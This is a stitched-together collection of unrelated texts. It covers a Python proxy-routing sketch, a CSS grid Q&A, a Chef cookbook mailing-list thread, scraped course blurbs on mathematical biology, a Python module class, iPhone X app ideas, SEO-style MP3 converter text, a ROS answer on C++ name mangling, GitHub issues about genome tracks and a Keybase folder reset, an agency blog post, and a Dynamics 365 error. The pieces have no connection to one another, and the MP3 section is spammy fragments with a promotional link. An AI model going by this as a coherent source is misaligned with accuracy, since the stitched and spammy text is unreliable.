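The setup proposed in the question, a front proxy on port 80 routing each context path to a webapp in its own JVM on its own port, boils down to a routing table. A minimal sketch in Python; the paths and ports are made up:

```python
# Hypothetical routing table: context path -> backend port.
# Each backend is a separate webapp running in its own JVM.
ROUTES = {
    "/shop": 8081,
    "/admin": 8082,
}


def backend_for(request_path, default_port=8080):
    """Longest-prefix match of the request path against deployed webapps."""
    best = None
    for context, port in ROUTES.items():
        # Match "/shop" and "/shop/...", but not "/shopping".
        if request_path == context or request_path.startswith(context + "/"):
            if best is None or len(context) > len(best[0]):
                best = (context, port)
    return best[1] if best else default_port
```

backend_for("/shop/cart") resolves to port 8081, while an unknown path falls through to the default app; restarting the "/shop" webapp then only touches the JVM behind 8081, which is exactly the isolation the question is after.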
STACK_EXCHANGE
Lost doesn't remove margin right

From the documentation:

Every element gets a float: left and margin-right: gutter applied to it except the last element in the row. Lost will automatically detect the last item in a row (based on the denominator you passed) and apply a margin-right: 0 to it by default.

Yet with this simple css

nav { lost-utility: clearfix; lost-column: 1/3; }
div { lost-column: 2/3 0; }
body { lost-utility: edit; }

and this html:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="description" content="description of your site">
<meta name="author" content="author of the site">
<title>/index.html</title>
<link rel='stylesheet' href='css\test.css' />
</head>
<body>
<nav>
<h3>Tyler Thrailkill</h3>
<p>Don't look back</p>
<a href="/blog">blog</a>
<a href="/">home</a>
<a href="/tutorials">tutorials</a>
</nav>
<div class="posts">
<div class="post"></div>
<h2><a href="\posts\test.html">Hello world</a></h2>
<date>1/2/2015</date>
<p>I talk about nothing</p>
</div>
<script src='js\main.js'></script>
</body>
</html>

my page looks like this:

When I examine the css, it still has a margin-right of 30px on the 2/3 div. Shouldn't that be 0px?

Yes, I'm currently figuring out a fix for this over here https://github.com/corysimmons/lost/issues/109

I looked over that thread before posting this one, but I wasn't sure if it was the same issue. What can I do to fix this for right now, if there even is a fix? I'm kinda new to a lot of this stuff. Don't even know what cycle is.

You can manually add margin-right: 0 to that element. cycle basically sets nth-child(Xn) to margin-right: 0. I'll try to get this fixed tonight.

Cool, that worked. I'll keep it like this until you update the library. Thanks for the help!

Library updated, but now that I'm re-reading this issue, I don't think it's the same thing. I think your code might be a bit broken.
Here's what I would do:

<section>
<nav>...</nav>
<div class="posts">...</div>
</section>

section { lost-utility: clearfix; }
nav { lost-column: 1/3; }
.posts { lost-column: 2/3; }

Ok, so I think maybe I'm misunderstanding how to use Lost properly. When I use the code you've posted (in other words, putting the nav and div in a <section> tag) the css works. As soon as I make nav and div direct children of <body> it reverts to the margin on both tags.

Lost operates using a lot of nth-child stuff, so when it's a direct child of <body> things like <script>, etc. get counted as children. By starting your code in some sort of wrapper (just not body) you fix this.

Ah, I understand. Great, well that fixed my issue so far!
GITHUB_ARCHIVE
In the demonstration that Jamie Windsor did for berkflow at Chefcon he used a role/environment cookbook with multiple roles rather than a single role. I think in your case, if you have a cookbook per role, then the only way you can make it work that way is if the cookbooks common to your role cookbooks all have the same version requirement (or no specific version requirement). I.e. if your lb cookbook needs nginx 1.2.3 but your web cookbook needs 1.2.4, and those versions are locked, then there's not much you can do, as you'll have conflicting version locks in your environment. If you don't have one role cookbook per role, or you don't have these specific version requirements, then it's pretty easy. You'd make a top-level cookbook to wrap your role cookbooks, which would be your environment cookbook (or if you have one role cookbook with multiple roles then this could be your environment cookbook), then just add the Berksfile.lock from the cookbook to source control, make sure it's not in chefignore, and that's your one source of version locks which you can apply to all environments. You then add the recipes from the environment cookbooks to your nodes/roles. As there's no actual logic in the environment cookbook, whenever you want to update your environments you bump the metadata on the environment cookbook, run berks update and then upload it to your chef server. You can then use berkflow to apply the cookbook from your chef server to an environment, which will apply the locks only. You can now use your environments for whatever attributes you want.

On Mon, Jun 22, 2015 at 10:43 PM, Torben Knerr email@example.com wrote:

ah, interesting, was not aware of the fact that it would apply the cookbook locks to an existing environment while keeping the env attributes. That gives me some new thoughts. However, that would still mean I have one environment per node (or "role" at least), e.g.: "prod_lb", "prod_web", "prod_db" etc., right?
If so, that would also mean I have to duplicate the prod-specific attributes here (3x in the example above), right? I realize I might be able to get around this using the YAML include approach Ranjib shared, which would keep it single-sourced, but still I'd need to update each of the "prod_*" environments from that single source. Last but not least, it might have an impact on searches or environment checks as well, but that could be dealt with easily I guess, at least if it's happening in your own recipes where you are in control of it. If there's a better way to work with berksflow / berks apply while keeping the intuitive environment semantics, I'd be happy to learn more about it.

On Mon, Jun 22, 2015 at 5:33 PM, Yoshi Spendiff <

Not sure if you know, but the a) and b) choices you stated above aren't actually mutually exclusive. If you want to use berkflow / berks apply to apply cookbook version locks to an environment, that doesn't stop you supplying normal environment attributes to the environment. Berkflow / berks apply doesn't change any attributes other than the version locks.

On Sun, Jun 21, 2015 at 6:39 AM, Torben Knerr firstname.lastname@example.org wrote:

I believe you first have to decide for what purpose you actually want to use Chef environments, and this decision then limits the options for technically implementing this.
For me the key decision is:

a) if you are going to use the berkflow / environment cookbook "berks apply" approach, then this means you will end up with one environment per node
b) if you are going to use environments for dev / test / staging / prod stages, you probably want to share environmental attributes across many nodes

Personally, I prefer b) and try to stick to the following principles:
- use environments only for supplying environment-specific data
- don't use environments for composing a node's run list or other node attributes
- instead I use a single "top-level" wrapper cookbook per node, which
  - glues together the run list
  - sets attributes for configuring the wrapped cookbooks
  - sometimes adds additional glue code
  - locks the whole cookbook dependency graph via metadata.rb (so I can do it per node here and don't need to use an environment for that)
  - defines the interface for the user (i.e. README, attributes, etc...)
- the environments should contain only environment-specific attribute overrides + the versions of the "top-level" cookbooks

Since I'm wrapping other cookbooks and setting their attributes in (the "top-level" cookbook's) recipe, I'm sometimes faced with the "computed attributes problem". I tackle that by reloading the wrapped attributes file between setting the attributes and including the recipe, e.g. here:

Also, my environments often share the same data, i.e. common attributes that are environmental data but still the same for many or even all of my environments. Ranjib recently posted a nice way on how to deal with that:

Hope that helps or at least gives you some more ideas. There are many ways and even more opinions.

On Fri, Jun 19, 2015 at 4:22 PM, Douglas Garstang <

If I was going to move my environmental attributes into cookbooks... When deployed to an instance, the top level run list would need to include the environmental run list. That's ok.
However, when testing, this would mean that each cookbook would need to either include the environment cookbook (i.e. #include_recipe "env-dev") and refer to it in the metadata.rb and Berksfile files, OR I'd have to specifically put each attribute into the Vagrantfile's json data. This might work for simple cookbooks, but it would mean the cookbook is not being effectively tested. The attributes I'm testing against aren't what really gets deployed to an instance. I also have to maintain two copies of the attributes, and the worst-case scenario is where the attribute is set in both places but the value in the Vagrantfile is incorrect and therefore leads to the incorrect assumption that the cookbook is working.

For my base cookbook it gets even worse. It would need to have every single attribute from every cookbook it includes put into the Vagrantfile's json data. This just does not scale. It doesn't seem like the benefits of gaining some revision control outweigh the maintenance disadvantages here. For all those that espouse the use of putting environment attributes into a cookbook, how do you get around

Mobile: +1 778 952 2025
OPCFW_CODE
A COURSE IN MATHEMATICAL BIOLOGY

Mathematical Biology - Department of Mathematics, Hong ...
This course is primarily for final year mathematics major and minor students. Other students are also welcome to enroll, but must have the necessary mathematical skills. My main emphasis is on mathematical modeling, with biology the sole application area. I assume that students have no knowledge of biology, but I hope that they

MATHEMATICAL BIOLOGY. BIOLOGY 215.
A first course applying mathematics to biological problems. Topics drawn from cell and molecular biology, molecular evolution, enzyme catalysis, biochemical pathways, ecology, systems biology, and developmental biology. Instructor: Mercer.

Free Biology Tutorial - A mathematical way to think about ...
A mathematical way to think about biology comes to life in this lavishly illustrated video book. After completing these videos, students will be better prepared to collaborate in physical sciences-biology research. These lessons demonstrate a physical sciences perspective: training intuition by deriving equations from graphical illustrations.

Mathematical Biology Courses and Schools. Find out about courses that apply mathematics to biology to create models used in study and research. Get information on what you'll learn, how to choose a school and what careers you could pursue in this field.

biomathematics, and mathematical modeling, and volumes of interest to a wide segment of the community of applied mathematicians, computational scientists, and engineers. Appropriate subject areas for future books in the series include fluids, dynamical systems and chaos, mathematical biology, neuroscience, mathematical

Mathematical Representations of Cell Biological Systems I ...
So how do mathematical representations help us solve biological problems? What mathematical representations do is to deal with complex systems in an orderly fashion.
And in the case of cell biological and regulatory biology problems, they allow us to predict input/output relationships as a function of time or space, or other variables.

The mathematical biology concentration consists of 5.25 credits, an integrative project, and participation in a Math Biology Symposium. A student may petition to count a course other than the pre-approved electives toward his or her concentration if the student can show, and the director concurs, that the course includes an integrative component related to mathematical and/or computational biology.

Math 113B: Intro to Mathematical Modeling in Biology :: UC ...
Math 113B: Intro to Mathematical Modeling in Biology (English) Course Information. This course is intended for both mathematics and biology undergrads with a basic mathematics background, and consists of an introduction to modeling biological problems using continuous ODE methods (rather than discrete methods as used in 113A).

Mathematical Modelling in Systems Biology: An Introduction
to be extended to mechanistic mathematical models. These models serve as working hypotheses: they help us to understand and predict the behaviour of complex systems. The application of mathematical modelling to molecular cell biology is not a new endeavour; there is a long history of mathematical descriptions of biochemical and genetic networks.

This graduate course, taught May 1-31, 2012, was partially sponsored by the PIMS International Graduate Training Center (IGTC) in Math-Biology, and by independent funding held by Leah Keshet. Large parts of this course are available online at the course Home Page, where relevant biological topics and mathematical background needed to understand ...

Mathematical Biology BSc (Hons) | University of Dundee
We have a strong reputation for research in Life Sciences and for the Mathematical Biology Research Group. You will be taught by leading research active academics.
You will also be able to join DUMaS (Dundee University Maths Society), an active society open to all students studying mathematics or mathematical biology.

This is a combined textbook review and course plan for a biomathematics modeling course that is taught at the author's home institution as a foundation course in the Biomathematics Master's Program. The pros and cons of using Linda J.S. Allen's textbook, An Introduction to Mathematical Biology, for a one-semester course are discussed.

In addition, mathematical skills essential for biologists are covered thoroughly as part of this course, including levels of measurement, permutations and combinations, and tests for categorical data including Relative Risk, Odds Ratio and so on. Fun facts and games included in the course are expected to pique interest among the participants.

Mathematical Biology | School of Mathematical and ...
Our areas of expertise: differential equations, dynamical systems, probability and their applications to modeling in fields such as neuroscience, epidemiology, population biology and ecology, systems biology, soft matter (lipids, proteins) at interfaces, and cancer.

Mathematical Biology - my.UQ - University of Queensland
Please Note: Course profiles marked as not available may still be in development. Course description: Mathematical modelling of biological systems, with a particular focus on neuroscience and cell biology.

Mathematical Modeling in Biology | University of Michigan ...
Mathematical biology is a fast growing and exciting modern application of mathematics that has gained worldwide recognition. In this course, mathematical models that suggest possible mechanisms that may underlie specific biological processes are developed and analyzed.
OPCFW_CODE
from abc import ABC, abstractmethod

from kernel.output import Output, OutputResult


class AbstractModule(ABC):
    def __init__(self):
        # Sibling module chain, where submodules are located
        self.module_chain = None
        # Current module chain, where module is located
        self.current_module_chain = None
        # Parent module chain
        self.parent_module_chain = None
        self.filter_files = False
        self.collect_data = False
        self.extract_data = False
        self.args = None
        self.title = None
        # Initial value is none, can be filled during execution
        self.files = []
        # Data collected from files
        self.data = {}
        # Extract options
        self.extract = {}

    @abstractmethod
    def check(self):
        pass

    @abstractmethod
    def check_arguments(self):
        pass

    # Gives information if module filtering files or not
    def is_filter_files(self) -> bool:
        return False

    # Gives information if module collecting data from analyzed files
    def is_collect_data(self) -> bool:
        return False

    # Does module have extract options
    def is_extract_data(self) -> bool:
        return False

    def description(self) -> str:
        return ""

    def do_filter_files(self):
        pass

    def do_collect_data(self):
        pass

    def do_extract_data(self):
        pass

    def execute(self):
        Output.do("Executing module: \"%s\"" % self.__class__.__module__.replace("modules.", "", 1))
        try:
            if self.is_filter_files():
                self.do_filter_files()
                Output.ok("Files: %d" % len(self.files))
            if self.is_collect_data():
                self.do_collect_data()
            if self.is_extract_data():
                self.do_extract_data()
        except PermissionError as e:
            Output.fail("Permission error. Could not read file \"%s\"" % e.filename)
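To show how the hooks above are meant to be used, here is a minimal sketch of a concrete module. TxtFilter and the stubbed Output class are hypothetical stand-ins (the real Output lives in kernel.output, which isn't shown here), and AbstractModule is condensed to the parts the example exercises:

```python
from abc import ABC, abstractmethod


class Output:
    """Stand-in for kernel.output.Output, just enough for this sketch."""
    @staticmethod
    def ok(msg):
        print(msg)


class AbstractModule(ABC):
    """Condensed version of the AbstractModule listing above."""

    def __init__(self):
        self.files = []
        self.data = {}

    @abstractmethod
    def check(self):
        pass

    @abstractmethod
    def check_arguments(self):
        pass

    # Subclasses opt into phases by overriding these predicates.
    def is_filter_files(self) -> bool:
        return False

    def is_collect_data(self) -> bool:
        return False

    def do_filter_files(self):
        pass

    def do_collect_data(self):
        pass

    def execute(self):
        # Template method: run only the phases the subclass opted into.
        if self.is_filter_files():
            self.do_filter_files()
            Output.ok("Files: %d" % len(self.files))
        if self.is_collect_data():
            self.do_collect_data()


class TxtFilter(AbstractModule):
    """Hypothetical module that keeps only .txt files."""

    def __init__(self, candidates):
        super().__init__()
        self.files = candidates

    def check(self):
        return True

    def check_arguments(self):
        return True

    def is_filter_files(self) -> bool:
        return True  # opt into the filtering phase

    def do_filter_files(self):
        self.files = [f for f in self.files if f.endswith(".txt")]


module = TxtFilter(["a.txt", "b.log", "c.txt"])
module.execute()  # prints "Files: 2"
print(module.files)
```

The is_* predicates plus execute() form a template method: the base class fixes the phase order, and each module only implements the phases it declares.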
STACK_EDU
M: Ask HN: What can you build with iPhone X? - zaroth
Does anyone look at iPhone X and say, "Wow, now I can finally build an app which does _____!"?

R: arjunvpaul
A blind interview application to avoid bias. With a combination of Face Tracking and Voice Modulation (see: https://www.voicemod.net), one could now have an Interviewer avatar interviewing an Interviewee avatar.

R: arjunvpaul
An application that could SIGNIFICANTLY reduce returns for online clothing retailers. About 70% of garment returns are because the clothes didn't fit as the customer expected or hoped (Source: https://goo.gl/djcgUx). The iPhone X basically has a Kinect stuffed into it now. One could now take a high quality 3D image of themselves, store it on their profile, and be shown ONLY clothes, shoes, sunglasses, gloves etc. that fit them while shopping online. Now, before you say fit is not all about having a nice 3D image: for a retailer like Asos (www.asos.com), a 1 percent fall in returns would immediately add 10 million pounds ($16 million) to the company's bottom line (Source: quote from ASOS CEO Nick Robertson). How about them apples?

R: arjunvpaul
Aren't you curious to see how ridiculous you could look asking "Are you not entertained?!" in a Roman colosseum? How about a fun app that lets you take famous clips from movies and overlay your face on them. Kinda like Face Swap for video.
HACKER_NEWS
That said, the encoder used to make the file has a much bigger effect on the quality. I used to use 256k AAC on my Shuffle and got noticeably harsh highs and slightly muddy drums on some tracks. Then, switching over to MP3 at 220k, a lot of the harshness is gone and I can barely notice a difference between that and 320k.

Free Convert MP3 To WAV
If I have an MP3 file, how can I convert it to a WAV file? (ideally, using a pure Python method)

CD to MP3 Converter - convert MP3 to WAV
I knew this app when I was looking for an app to download MP3s simply. It helped me a lot. It also gave me an idea to download video online with this sort of software. As I said before, I really want a complete application which can help me download MP3 and MP4. Unfortunately, only vGuruSoft Video Downloader for Mac allows me to do that. http://www.macvideodevice.com/vgurusoft-video-obtainer-mac.html

Youtube Downloader & Youtube to MP3 converter.
Do you listen to music sites apart from YouTube? Not only can you download YouTube videos on Flvto.biz, but for the first time ever, you can convert music from a lot of different video-hosting sites including Vimeo, Dailymotion, Metacafe, Facebook, and more! Simply paste the URL from any website, and convert your video to an MP3 in high quality.

Audacity is a free and open source Audio Editor which allows you to convert ogg to mp3, convert mp3 to ogg, convert vinyls to mp3 or ogg, do any kind of home recording, remove noise, and so forth. I have used it to record and mix a few of my band's songs. Feel free to check out this page to download some songs.
As an amateur I choose FLAC: it's easier to listen to on high-end sound systems, it sounds better on high-end devices, and you can do your own conversions to smaller MP3s for your smaller devices; space is not so much an issue these days. Personally I enjoy listening to FLACs because it makes those cheap speakers sound that little bit better, and as for those high-end devices, you do notice the difference. Buy yourself a cheap oscilloscope and have a look at the difference yourself; your ears may only be able to hear a select range of frequencies, but the definition of the tones you hear is something else. You'll notice an improvement after a while of listening to higher quality audio files. And as for those guys with high-end car stereos who want to get the most out of their music, listening to their beats as loud as they can, try comparing the difference between the qualities after compressing your audio for extra loudness; it does make a difference.
OPCFW_CODE
using an external library: C versus C++ issue

I downloaded a vendor's library for accessing analog I/O (http://www.rtd.com/software/CM/aAIO/aAIO_Linux_V02.00.00.tar.gz) on their motherboard (http://www.rtd.com/PC104/CM/CMX32/CMX32MVD.htm) and it works fine. I can compile the driver, install the driver, compile the library, compile the example usage code and run the example usage code that uses the library. It works like a charm. All the compiles use the command line "make" command. My problem is that I can't figure out how to get this exact same example code to compile in my catkin workspace and then add ROS code into it so I can publish the analog readings as ROS topics. (Actually the link to the tarball above is old and the vendor emailed me a new version that is not on their website yet. Let me know if you would like me to get that corrected tarball to you.)

The example code I want to start with is "soft_trig.c" from the examples folder. I can copy that file into my catkin package, add it to the CMakeLists.txt, get it to compile as straight C code linked to the library without any ROS calls, and even execute it using rosrun just fine. Here is my working CMakeLists.txt:

cmake_minimum_required(VERSION 2.8.3)
project(ros_aaio_node)

find_package(catkin REQUIRED COMPONENTS
  roscpp
  rospy
  std_msgs
)

catkin_package(
)

include_directories(
  ~/aaio/include
  ${catkin_INCLUDE_DIRS}
)

link_directories(~/aaio/lib)

add_executable(ros_aaio_node src/soft_trig.c)

target_link_libraries(ros_aaio_node
  rtd-aaio
  ${catkin_LIBRARIES}
)

So now I want to add ROS stuff to the file so I can publish data as ROS Topics. This is where I don't know what to do. I added #include <ros/ros.h> to the file and I got lots of compile errors. Lots of header files were not found. It occurred to me that all my other ROS code was cpp files, not c files, so I renamed the file to soft_trig.cpp and changed the executable line in the CMakeLists.txt file too, and I get a lot of different compile errors now.
Tons of deprecated conversion warnings and several invalid conversion errors. I saw some working code on another project where a coworker had been using a straight C compiled library with their ROS code and they used these two lines in their CMakeLists.txt: set(CMAKE_C_FLAGS "-std=c99" ) set(CMAKE_CXX_FLAGS "-fpermissive") So I tried that and all the compiler warnings and errors went away. But now I get a whole slew of undefined reference errors during linking. Linking CXX executable ~/catkin_ws/devel/lib/ros_aaio_node/ros_aaio_node CMakeFiles/ros_aaio_node.dir/src/soft_trig.cpp.o: In function `main': soft_trig.cpp:(.text+0x851): undefined reference to `aAIO_Open(aAIO_Descriptor**, unsigned char)' soft_trig.cpp:(.text+0x873): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x8a0): undefined reference to `aAIO_Reset(aAIO_Descriptor*)' soft_trig.cpp:(.text+0x8c2): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x934): undefined reference to `aAIO_Install_ISR(aAIO_Descriptor*, void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), void (*)(unsigned int), int, int)' soft_trig.cpp:(.text+0x956): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0x99c): undefined reference to `aAIO_Interrupt_Enable(aAIO_Descriptor*, aaio_channel, aaio_interrupt)' soft_trig.cpp:(.text+0x9be): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xa7f): undefined reference to `aAIO_Write_CGT_Entry(aAIO_Descriptor*, aaio_cgt)' soft_trig.cpp:(.text+0xaa1): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)' soft_trig.cpp:(.text+0xae2): undefined reference to `aAIO_Software_Trigger(aAIO_Descriptor*)' soft_trig.cpp:(.text+0xb04): undefined reference to 
`aAIO_Return_Status(aAIO_Descriptor*, int, char*)'
soft_trig.cpp:(.text+0xb3e): undefined reference to `aAIO_Read_Result(aAIO_Descriptor*, aaio_channel, int*)'
soft_trig.cpp:(.text+0xb60): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)'
soft_trig.cpp:(.text+0xc50): undefined reference to `aAIO_Remove_ISR(aAIO_Descriptor*)'
soft_trig.cpp:(.text+0xc72): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)'
soft_trig.cpp:(.text+0xc9f): undefined reference to `aAIO_Reset(aAIO_Descriptor*)'
soft_trig.cpp:(.text+0xcc1): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)'
soft_trig.cpp:(.text+0xcee): undefined reference to `aAIO_Close(aAIO_Descriptor*)'
soft_trig.cpp:(.text+0xd10): undefined reference to `aAIO_Return_Status(aAIO_Descriptor*, int, char*)'
collect2: error: ld returned 1 exit status

These are all the calls to the C-compiled library that the example file was linking to and using just fine when the filename was soft_trig.c. Now that the filename is soft_trig.cpp, I get these linker errors. I can't seem to win. What am I doing wrong? How can I use this existing example C code and turn it into ROS code?

Originally posted by Kurt Leucht on ROS Answers with karma: 486 on 2016-02-19
Post score: 0

There are (at least) two issues here (both of which are - strictly speaking - actually not very ROS-specific):

1. compiling C code with a C++ compiler
2. C++ name mangling

re 1): as you discovered, renaming a file with C code doesn't necessarily make it (valid) C++, hence the need for the compiler flags. Warnings like "deprecated conversion" are exactly what one would expect.

re 2): linking probably fails because C++ mangles names. The linker is looking for a mangled symbol like ?Fi_i@@YAHH@Z, while the manufacturer's library exports a plain int Fi_i(int bar). Compiling the C code as C++ is most likely the cause.

Suggestion: treat the library you got from the manufacturer as just another system dependency.
Use the normal make, (sudo) make install procedure to install the manufacturer's lib and headers into /usr/local (or wherever it installs), like you already did before you "add(ed) ROS stuff". Then either - as you do now - hard-code the location of the headers and library in your CMakeLists.txt (not recommended), or write a minimal FindAAIO.cmake (or whatever you name it) that searches for the library and headers at CMake configuration time (highly recommended). Up to here everything is actually non-ROS-specific: this is a normal CMake workflow. For your ROS node(s), just #include <..> the necessary headers from the manufacturer's library into your C++ sources, but make sure they already do something like:

#ifdef __cplusplus
extern "C" {
#endif
...
#ifdef __cplusplus
}
#endif

This basically tells a C++ compiler not to mangle the names of any symbols declared inside those guards. I'd be surprised if the manufacturer's headers don't already do this, but do check. This avoids the linker errors you encountered earlier. Ideally your ROS node(s) would now be just a 'thin wrapper' around some AAIO library functions.

Originally posted by gvdhoorn with karma: 86574 on 2016-02-20
Post score: 3

Comment by Kurt Leucht on 2016-02-22: Thanks! Adding the extern "C" wrapper to all the vendor's header files appears to have worked!
Comment by gvdhoorn on 2016-02-23: Alternatively, you could extern "C" your #include <> statements (so in your own sources). That way you don't have to change the vendor files.
Comment by Kurt Leucht on 2016-02-23: That's even better! Thanks!
Parent tracks aren't available
I'm testing some GRCh38 stuff using these links: https://iobio.s3.amazonaws.com/samples/bam/NA12878.GRCh38.bam https://iobio.s3.amazonaws.com/samples/bam/NA12891.GRCh38.bam https://iobio.s3.amazonaws.com/samples/bam/NA12892.GRCh38.bam https://iobio.s3.amazonaws.com/samples/vcf/platinum-exome.GRCh38.vcf.gz And I put in gene F5. The proband track appears, but if I go to the Other Tracks dropdown, the only option is ClinVar. Why are the parent tracks not visible? Actually, even if you try entering the demo URLs in GRCh37, the mother and father tracks are not available. https://s3.amazonaws.com/iobio/samples/bam/NA12878.exome.bam https://s3.amazonaws.com/iobio/samples/bam/NA12892.exome.bam https://s3.amazonaws.com/iobio/samples/bam/NA12891.exome.bam https://s3.amazonaws.com/iobio/samples/vcf/platinum-exome.vcf.gz
The flags that are used to show these tracks are not being set. I will get a fix for this.
@AlistairNWard This is ready for testing on stage.gene.
Remind me (and add to the deployment plan wiki page) whether I test on dev.gene or stage.gene. I keep forgetting!
You test on stage.gene. The pull request linked to this issue was reviewed and merged onto the dev branch. With that, the staging version gets updated. However, if a developer wants quick feedback on an issue, he can update the dev version and ask you to test on dev.gene.
Why do we not see the coverage in the parent tracks? This is also important information, and I'm sure we used to see that.
I tested on stage.gene and got this?
This is (almost) correct. When there are no variants present, having a specific message stating that there are no variants makes it clear that the empty track isn't a bug. That said - why do we see the message twice for the proband?
Alistair Ward, PhD
Co-founder | President | COO
Frameshift Genomics Inc.
Director, Research and Science
Eccles Institute of Human Genetics
University of Utah School of Medicine

On Wed, Nov 25, 2020 at 4:16 PM Matt Velinder <EMAIL_ADDRESS> wrote:
I tested on stage.gene and got this? [image: image] https://user-images.githubusercontent.com/22081541/100282381-b8c44580-2f28-11eb-9671-b369feb879d6.png

I have fixed the "No variants are present in proband" message appearing twice. You can try it on stage.gene.
Looks good to me
Rekey impossible
http://prntscr.com/jt9ujq Impossible to rekey this folder. (I already have a new paper key.)
@InTheFlipside maybe you lost/revoked all your previous devices and now there are no devices that can rekey it. We can reset it for you if you want. If you want us to reset your folder, please run this command on a currently-valid Keybase device, and substitute the current date and time where indicated:

keybase sign -m "<DATE_AND_TIME>: Please reset folder /keybase/private/filpside because all the devices that have access have been revoked."

and post the results here.

BEGIN KEYBASE SALTPACK SIGNED MESSAGE. kXR7VktZdyH7rvq v5weRa0zkMT1xSL jysgVXKg6MRmLZU DyNxPFa3WI8afXe OyVo3Vdiy3MXe5F Z2irofYi6EQQssR 4eyywGdg3temtHj IczAyGtXeLDBCvd fPi15WUKuSafsUK DfGQysAke78NJzc vUhgmteFRUqO1VU lU4QNsijGneFcv1 WkuazFymfFVaOCb XysMhwwEDnwZGZE qLjbEPheJ7z3VR0 xuI7sWfjXQJOIDn adTDeAYEX1XyLcH wSEN6mvldOu0x3s IEUa4oBy89aTILo 7mStmuDEWr1H0cq MOzQeKGi6ahq0NF L2o193Xn0VhE4nd Xnsmxi9scmClEW9 ovbAherEAI. END KEYBASE SALTPACK SIGNED MESSAGE.

Sent, thanks :)
@InTheFlipside I looked into this a little and saw that your folder is still keyed for your device SourceCode, which hasn't yet been revoked. Assuming that device is still online somewhere, I think the problem is likely a bug that is preventing your rekey. (I could tell for sure if you do a keybase log send from SourceCode and post the resulting log ID here.) Depending on your operating system, you could try upgrading, though the bug fix isn't released on all platforms yet. If it hasn't been released yet, you might be able to use an experimental build instead of waiting for the next release on your platform. If you'd rather I just reset your folder anyway, that's fine too; just confirm that you want that. I just like avoiding resets if possible.
@strib Thanks for your answer. SourceCode is deleted (it was my previous Windows machine). I revoked it. (I sent keybase log send, before and after.) Can you reset this folder please?
I gave up a little on finding a solution. (I doubt it contains important files; I don't remember, but it's not important.) Thanks a lot!
I reset the folder. Please check it out and close this if everything seems ok. (Might require a Keybase restart.)
Everything is okay, thanks :)
“How should we get started?” is a question we’ve grown used to hearing. “Let’s find out together!” is the answer we’ve grown used to giving. There’s no magic recipe in Product Development. Every business operates in different circumstances, and quality is about making the best out of each context. That’s why, when potential clients knock on Pixelmatters’ door and want to start fast, they hear many questions from us first. Without understanding the business and the current Product, going fast will lead to a dead-end street. For a product to succeed, we should play for the long run by starting small and iterating quickly. That’s why Phase 0 is essential.
What happens in Phase 0? Lasting from a few days to a couple of months, it will roll out a bit like a Sherlock Holmes movie. There’s a mystery to solve — where should we start here? To determine what should be worked on first, we begin by assigning a smaller cross-functional team consisting of a Product Owner, a Designer, and an Engineer - usually senior people from across the company - who may or may not be a part of the team later on. Depending on the context, this smaller cross-functional team's constitution may vary, and we may have other senior roles involved for a short period of time. The rest of the team joins later, once there’s a defined path for what’s ahead in the coming weeks/months — for example, the remaining Engineers who were not a part of Phase 0. In parallel to determining priorities with this team, we kick off another part of Phase 0 — clarifying the path and building alignment with the client. The rest of the team that will build the Product isn’t involved at this point, for efficiency's sake - the goal is to onboard them once the plan is clearer. After all, Sherlock Holmes only has Watson by his side the entire time for a reason - too many people would only slow him down in such an exploratory phase.
As the purpose of Phase 0 is to build alignment on what can be a potential MVP or initial iteration, the first step is to understand the following:
- The business model;
- The current Product (if any);
- Previous work done on top of the Product;
- The main goals for the first months of the collaboration (and why those are the priority).
At this stage, the Product Owner often leads the efforts in close collaboration with peers from Design and Engineering as they’re still identifying the main opportunities and planning the initial requirements. It’s also a period of divergence where multiple ideas and alternatives are discussed. After all, this is a collaboration, and clients expect to hear our advice on how to move forward! 🚀 Once there is a high-level understanding of the business and the Product, and the main goals are identified, it’s time to get our hands dirty and start converging.
From First Conversations to Groundwork
This is where Design and Engineering take over, collaborating with each other and with Product as we dig deeper into what’s needed before the rest of the team that will be a part of the project joins. The work we do here can take many shapes and forms depending on what comes out of the first conversations - the most common scenarios are:
- The client knows the direction and the potential solutions, and Phase 0 is used to craft a couple of ways to get there;
- The client doesn’t know the direction or potential solutions but knows the problem at hand and needs our help during Phase 0.
We might adapt the depth and focus of our work depending on the scenario, but our need to understand the users from a technological standpoint doesn’t change. A few exercises we can conduct on the Design side:
- Personas - Build the user personas by analyzing internal documentation provided by the client or by interviewing customers.
- Customer Journeys - Craft the most helpful customer journey, considering the initial features we’ll work on.
- Crazy 8s - Once the client identifies a problem, the team gathers around and starts brainstorming potential solutions to solve it - the primary outcomes are discussed with the client, and one idea can serve as the starting point to get things going.
- Wireframes - If there’s a specific flow in mind, this is also a good time to draft a set of wireframes to materialize some thoughts.
On the Engineering side, the focus is mainly on making the first critical decisions to get things going:
- Code Analysis - If there’s a current product in place, we conduct a thorough audit to identify any immediate changes and learn the foundations on which we’ll start building the code.
- Architecture & Infrastructure - If not yet in place, decisions related to the Product’s architecture & infrastructure are essential to start with. This gives the rest of the Engineering crew a common understanding of the guidelines everyone should follow to ensure the Product’s scalability, consistency, and good practices.
- Tech Stack Proposal - If there’s no product already built or we’re starting from scratch, defining a tech stack is a good step to begin with. This can lead to a quick proof of concept to validate a few assumptions in the Product’s context, even if, at this stage, it only unblocks a product or design decision.
The initial discovery stage is crucial to success in a Sherlock Holmes mystery. The same applies to Product Development. Phase 0 gives us the necessary context to fully understand the Product, align expectations, and define the initial working points. Investing in this Phase 0 will allow us to position ourselves better to help you solve the essential mysteries that stand in the way of growing your business.
I get the following error constantly whenever I want to open Dynamics 365 dashboards. It happens to all users.

"An error has occurred. Try this action again. If the problem continues, check the Microsoft Dynamics 365 Community for solutions or contact your organization's Microsoft Dynamics 365 Administrator. Finally, you can contact Microsoft Support."

